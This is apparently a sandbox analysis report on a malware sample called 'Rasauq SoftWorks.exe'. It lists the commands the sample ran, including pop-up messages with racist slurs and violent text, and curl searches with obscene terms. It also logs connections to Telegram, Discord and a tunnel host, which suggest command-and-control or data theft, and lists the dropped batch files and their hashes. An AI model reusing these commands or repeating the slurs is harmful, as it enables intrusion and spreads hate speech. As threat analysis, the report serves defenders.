C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | sky-aerial-derby.glitch.me | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | sky-aerial-derby.glitch.me | udp |
| US | 151.101.194.59:443 | sky-aerial-derby.glitch.me | tcp |
| US | 8.8.8.8:53 | crl.starfieldtech.com | udp |
| US | 192.124.249.31:80 | crl.starfieldtech.com | tcp |
| US | 8.8.8.8:53 | looking-brings.gl.at.ply.gg | udp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | ocsp.int-r1.certainly.com | udp |
| US | 151.101.3.3:80 | ocsp.int-r1.certainly.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | media.discordapp.net | udp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 162.159.130.232:443 | media.discordapp.net | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | pattern-cyber-report.glitch.me | udp |
| US | 8.8.8.8:53 | pattern-cyber-report.glitch.me | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | pattern-cyber-report.glitch.me | udp |
| US | 8.8.8.8:53 | pattern-cyber-report.glitch.me | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 204.79.197.239:80 | edge.microsoft.com | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| IE | 94.245.104.56:443 | api.edgeoffer.microsoft.com | tcp |
| GB | 95.100.153.132:443 | copilot.microsoft.com | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.180.3:80 | o.pki.goog | tcp |
| IE | 94.245.104.56:443 | api.edgeoffer.microsoft.com | tcp |
| IE | 94.245.104.56:443 | api.edgeoffer.microsoft.com | tcp |
| US | 8.8.8.8:53 | niggafart.com | udp |
| US | 8.8.8.8:53 | niggafart.com | udp |
| US | 104.21.66.212:443 | niggafart.com | udp |
| US | 104.21.66.212:443 | niggafart.com | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 104.21.66.212:443 | niggafart.com | udp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 95.100.153.157:443 | www.bing.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | looking-brings.gl.at.ply.gg | udp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 13.107.253.64:443 | edgeassetservice.azureedge.net | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 104.21.66.212:443 | niggafart.com | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
Files
memory/620-0-0x00007FFB47E93000-0x00007FFB47E95000-memory.dmp
memory/620-1-0x0000000000820000-0x0000000000838000-memory.dmp
memory/620-3-0x00007FFB47E90000-0x00007FFB48951000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe
| MD5 | 12a225de8199d2a31f049a6f300d8cfa |
| SHA1 | 24819a452cf1db15167a52b12f258d27baacbd6e |
| SHA256 | 1399d955881d9db34cbe261c117818a7933a1cc7c8cdabcff8fc22c880053801 |
| SHA512 | 3e321ac6e35b83e0645611721354a03358da7dde8bc42f761e258f87fa2ae8a33c3778aa48b10e0ead87331eded7240b7134f9c05333a823a53258f7a52cac32 |
C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe
| MD5 | 7091469b8f2213255ba3c2870a60c7eb |
| SHA1 | 17e501e4900bf5dacc5cb0424db87d2ce7a89880 |
| SHA256 | d63b09f1a44ed10ff2e6aa558ab494ad561066fff13de330eae87e6749a0e3d7 |
| SHA512 | f67a4244cf2f4c6fdc728441d85e4e3d6cea3fd28fcc2b21aefc385257d3ad4eb177ff58acb07621b6fb6d4c331b7df80f5a9bd7a53c5d54bb91f000138223b8 |
memory/2700-26-0x00000000006B0000-0x00000000006BE000-memory.dmp
memory/2716-30-0x00007FFB47E90000-0x00007FFB48951000-memory.dmp
memory/2716-29-0x0000000000F70000-0x0000000000F8A000-memory.dmp
memory/2700-32-0x00007FFB47E90000-0x00007FFB48951000-memory.dmp
memory/620-33-0x00007FFB47E90000-0x00007FFB48951000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Launch.bat
| MD5 | 41bded52aa489cdea31a174f89bca818 |
| SHA1 | da072fb11e72d2762f96d0f901d7ef7bca17218d |
| SHA256 | 2172bb0729d91bcf777bbdd0c42dae9c71de0f1251d165655f551673bf622d59 |
| SHA512 | d0fa53492e783e627186d96dcf3ffcecc10f8895bd42a16f4946c34de6e4ec2bc156bab0e070ec0ebf9492f394d11d4c7929df1b57ca59cb6e11a566de3a6dd9 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s1xnc5ty.wik.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4408-44-0x000002138B290000-0x000002138B2B2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | a43e653ffb5ab07940f4bdd9cc8fade4 |
| SHA1 | af43d04e3427f111b22dc891c5c7ee8a10ac4123 |
| SHA256 | c4c53abb13e99475aebfbe9fec7a8fead81c14c80d9dcc2b81375304f3a683fe |
| SHA512 | 62a97e95e1f19a8d4302847110dae44f469877eed6aa8ea22345c6eb25ee220e7d310fa0b7ec5df42356815421c0af7c46a0f1fee8933cc446641800eda6cd1b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | dd827d87d4f068bc1a89b62eb8098c50 |
| SHA1 | b4af1c6abfeca3b3a5a32829a94aed17b51febfd |
| SHA256 | 1eed4317be345afde65ad49f9699615789a275edc3613a3be3de57bbf4e85950 |
| SHA512 | 2a53f125052f422c410ae1a1d9d1a83b437e28dc0161c6a72b111ce339be23a3400c14c6b67b88b887e90880da60ed632a7edf3d733315c143a8dc16f5bd11da |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3072fa0040b347c3941144486bf30c6f |
| SHA1 | e6dc84a5bd882198583653592f17af1bf8cbfc68 |
| SHA256 | da8b533f81b342503c109e46b081b5c5296fdad5481f93fe5cc648e49ca6238e |
| SHA512 | 62df0eed621fe8ec340887a03d26b125429025c14ddcdfef82cb78ce1c9c6110c1d51ff0e423754d7966b6251363bf92833970eaf67707f8dd62e1549a79536c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 47605a4dda32c9dff09a9ca441417339 |
| SHA1 | 4f68c895c35b0dc36257fc8251e70b968c560b62 |
| SHA256 | e6254c2bc9846a76a4567ab91b6eae76e937307ff9301b65d577ffe6e15fe40a |
| SHA512 | b6823b6e794a2fe3e4c4ecfb3f0d61a54821de7feb4f9e3e7fd463e7fbb5e6848f59865b487dafebeac431e4f4db81ef56836d94cac67da39852c566ed34a885 |
memory/2716-84-0x00007FFB47E90000-0x00007FFB48951000-memory.dmp
memory/2716-85-0x00007FFB47E90000-0x00007FFB48951000-memory.dmp
memory/2700-86-0x00007FFB47E90000-0x00007FFB48951000-memory.dmp
memory/2716-87-0x00007FFB47E90000-0x00007FFB48951000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmpB788.tmp.bat
| MD5 | fcd4bbb460a569c24197ddfda0e40834 |
| SHA1 | 043d6dc12c4a36aba9fb7675826bbec17a2b864a |
| SHA256 | d3f3a9b603b494ca1eb4013e3a6e1960143c22fa2f1d75771b6b2286653952d6 |
| SHA512 | f166df50c95b05ba97c4fe8f97c34f9e5f749aa296cd84f6e3b6244774ff9d0cf52f1a3c6d04a3891a64f6d19436553e9b14ca4fff3ba89c02b4f5ca47ebc45a |
memory/2700-93-0x00007FFB47E90000-0x00007FFB48951000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 34f595487e6bfd1d11c7de88ee50356a |
| SHA1 | 4caad088c15766cc0fa1f42009260e9a02f953bb |
| SHA256 | 0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d |
| SHA512 | 10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b |
C:\Users\Admin\AppData\Local\Temp\hig.bat
| MD5 | 0bef633cf86b1400fc172bc980679f4a |
| SHA1 | 2b0c618413f107eb4d242cb094b254e110d74fac |
| SHA256 | 8dc1f76281d8f0b54db59f1c16642577d4d7f26644e0b50dbd2359c2bbc6c4bb |
| SHA512 | da9a1e3dc6bcce6bc9eb72d06224aed4ce382107c517de81d31c1c5562109dd67bdf2d3fe513345577a7a37eee10674a16d1eda99c6759d1a628f41a19d991c2 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d8cb3e9459807e35f02130fad3f9860d |
| SHA1 | 5af7f32cb8a30e850892b15e9164030a041f4bd6 |
| SHA256 | 2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68 |
| SHA512 | 045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184 |
C:\Windows\System32\Rasauq\$77RasauqBroker.bat
| MD5 | 2cd713001f754501db9352be199b068d |
| SHA1 | 7b78d00055ffd0343dc85e18fb7dd3b878a91a80 |
| SHA256 | 9a6aedf35728aab3b7f79ab7161521553372ecafa8cde175b93f9207378273da |
| SHA512 | 52de353b6bbea37415a260d60cd4ae86d205471c826723156980fa87d054df407b2b2a03963efd183aec69b461da0f611ee57dbaf5caa4ff671c77b81fd63796 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 322574cb879ec3bfb0c338232c6c4433 |
| SHA1 | b5bdb44f0c7d62d00175f389569f59809434415b |
| SHA256 | b3e928ac387ca1f088335af81fd45ea373088d5cd9d5d5bfadd03f00a01fcb54 |
| SHA512 | 9aa9f6103c6b9f6e32f82274bdec3f3873031fd6c30d87bc8f34b29ec00bdbd3b37600985d91c85364eb2716bb6a93a4f396e67c2f29b704efd34ff63dc10064 |
C:\Windows\System32\Recovery\ReAgent.xml
| MD5 | 44b2da39ceb2c183d5dcd43aa128c2dd |
| SHA1 | 502723d48caf7bb6e50867685378b28e84999d8a |
| SHA256 | 894ee2b19608d10df4bf8b8f5bbcf40ce38c09c1f4c5543b6164f40c04bb270d |
| SHA512 | 17744dcaddb49f17fe67dc3a579f4df2b6c2b196776330b71edfc58b37d1f8ae477bfb718d2f23401b78b789b7f984b19341f50fbecfba1bc101f596dee40604 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 25605e2e0f4a4791e51d21be63c24fba |
| SHA1 | 31b97382fbff0286aeded845b45c35b5ac1f1b6c |
| SHA256 | c49262f4f9506263f09407edd6fd2ef2fd10d9a0e47a00e2ed0f8ca087aaecc1 |
| SHA512 | c3934e8199fa41f3f76f15765e033abc94cd6ce135100b809c7b2f086c2be89ca6e719175cc09a95b133b883667d92b146237c8e255ac3c1124cc5cad5ba6640 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3a6bad9528f8e23fb5c77fbd81fa28e8 |
| SHA1 | f127317c3bc6407f536c0f0600dcbcf1aabfba36 |
| SHA256 | 986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05 |
| SHA512 | 846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 10890cda4b6eab618e926c4118ab0647 |
| SHA1 | 1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d |
| SHA256 | 00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14 |
| SHA512 | a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a9451a6b9669d49bd90704dff21beb85 |
| SHA1 | 5f93d2dec01a31e04fc90c28eb1c5ca62c6fff80 |
| SHA256 | b2ff191507379930b97a212f869c3774c20b274e8fc9fcc96da5c154fb0e3056 |
| SHA512 | 06634cb578f6ce8d721e6306004082073fc224b91ceea37ef870df87b12b2d5f59e7d08b20b520787a1d13f3edbbb004197bf70f180f86dd7f401a5ad289ccb5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | f7114b322f301a74fffb1281e015fa47 |
| SHA1 | 1399807ecc4dec1540c317f49188a8261b0d1621 |
| SHA256 | 46d66810fd116702899d3a2afce3c68f808c4c1adf26d1b8bc951d4eab737bfa |
| SHA512 | 2dabe30c17e1c1e42aa7bc4e2981c55b14702b61cd9a95104b85a5c658b8935ef0ea4c2cec07b77ac0e298aa47ccbcfe8c3459b4cc0a00927cda88079c98976f |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 917ba5206776c19510c610309127a375 |
| SHA1 | 313a1606d1c43fc3b4ca876443fd55ddc9bad7aa |
| SHA256 | 2c7629b07c9164751435e0114e321afd298af3ed1c8d079a5c29d132072a4322 |
| SHA512 | 33e9f9bbaaeb02fb95239fad20c98bf59ad6d0b89403d2ccce77a40423ccb32ccfe9dfe7f6eb903f2bcb96bf96a3ab5d0dbe88f63ee58dbded46b41c409f559d |
\??\pipe\crashpad_1488_SYAFXSXYECZQKNHM
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 60d40d2b37759323c10800b75df359b8 |
| SHA1 | f5890e7d8fc1976fe036fea293832d2e9968c05c |
| SHA256 | c3a2f26d5aef8b5ed1d23b59ed6fce952b48194bed69e108a48f78aec72126e0 |
| SHA512 | 0c339563594cc9f930a64903281589886308d4412ee267e976520a58d86b2c339d7b2320e1b3fd6fbf81f092ff1735f0710c669af2986ea5b63d2c1e0a6df902 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00006f
| MD5 | eef911348f13105f1501b48929ef9224 |
| SHA1 | e8f3fd90ae05a940444a80a6c84cab08245891e3 |
| SHA256 | 5524773f6bb8874ae1ff858bf25ca03e86f90e3a6854448e7f85726b89271da8 |
| SHA512 | ead59bd08d3f11236caf5236ac17fc8af996ec2aa1322d547e26376f7fcc8109db2417b16267cd5f55480b6263fd70fbdabcc67f99c1b1f6385a20ca85f17814 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 110e632b2a11978956a648e984bb8d2f |
| SHA1 | 1561790eed5905b04ff10c453b0f9f9ada94d9ea |
| SHA256 | ad7977466fa4fcadc7377e39ed1d670f214693ed213affee58e6e8a71717d926 |
| SHA512 | b1363d5415a05690aa9dc34caed0321b63630e3dbe377d788bdf816e0f6104c04fae34097b9058b9d2bb09e2604625a21854e2ab1431f207a79dd36e0ba6ddde |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00006d
| MD5 | ab7fc8ab7d76d79285b17b4d9860cbf0 |
| SHA1 | b5833d99bda07236d2ad950fe452cf595fbc3c20 |
| SHA256 | 99933f6af1e17aadc2472a0d537dc4cd9ea565ca56ef5081eb00c806b351083b |
| SHA512 | 200083c436e414fe92512d317cb8434d4fb099ed4075b22e171feb4b379b9b72bbd5a926b5d8040bc0d27d54bb4df5841c509a0a95bb70becfbc5f7d7f5f2daf |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | dbd2a87f8d468e66359254d224b89aee |
| SHA1 | f91e12952a982869661918ef24409bae1a72b8c2 |
| SHA256 | c29ec852f0e2881b5325eb2ac0f4996d4f03f749b5e2faafc1f5cca6f779aecc |
| SHA512 | a039f13f63a8a3a0862a163bd95aa3a01100b80a7eeaf621adbc0b9c991bbd6c3fad88bca66b27939bc91b912472cdd9014b6dce96e3a3331bf8b7c5f9f7bb46 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries
| MD5 | 20d4b8fa017a12a108c87f540836e250 |
| SHA1 | 1ac617fac131262b6d3ce1f52f5907e31d5f6f00 |
| SHA256 | 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d |
